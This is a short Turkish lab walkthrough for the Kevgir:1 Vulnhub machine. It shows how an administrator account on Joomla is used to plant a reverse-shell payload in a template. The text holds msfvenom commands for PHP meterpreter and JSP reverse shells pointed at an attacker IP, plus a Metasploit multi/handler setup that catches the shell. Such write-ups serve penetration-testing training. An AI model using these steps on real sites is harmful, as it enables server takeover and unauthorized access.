Yazıda kullanılan Kevgir:1 sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/kevgir-1,137/
Joomla uygulamasına yönetici olarak erişim sağlandıktan sonra işletim sisteminde kod çalıştırabilmek için şablon yönetimindeki (“Extensions > Template Manager“) zafiyet istismar edilecektir.
Zafiyet istismarı için şablon seçilir.
Şablonun HTML kodu düzenlenir.
HTML kodu varsayılan olarak aşağıdaki gibidir. Bu kod silinerek yerine yeni bir kod eklenecektir.
Hedef sistemin saldırgan bilgisayarına (100.100.200.210) erişim sağlaması için msfvenom ile yeni bir payload hazırlanır.
ifconfig eth0
msfvenom -p php/meterpreter/reverse_tcp LHOST=100.100.200.210 LPORT=11223 -f raw
Not: Payload olarak JSP de kullanılabilirdi:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=100.100.200.210 LPORT=11223 -f war > /root/Desktop/kabuk.war
Hazırlanan bu kodun turuncu ile belirtilen alanı (başındaki “/*” kısmı alınmaz) kopyalanır ve şablon kodunun bulunduğu alana yapıştırılır. Sonrasında da şablon kaydedilir.
Şablonun başarılı bir şekilde kaydedildiği görülür.
Sayfa çağırıldığında msfvenom ile hazırlanan kod çalışacak ve ters bağlantı talebi oluşacaktır. Bu bağlantının yakalanması içinm saldırgan bilgisayarında multi/handler modülü başlatılır.
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 100.100.200.210
set LPORT 11223
exploit -j
Şablon ön izlemeye alındığında yazılı olan kod parçacığı çalışacaktır.
Böylece saldırgan tarafında Meterpreter talebi yakalanmış olacaktır.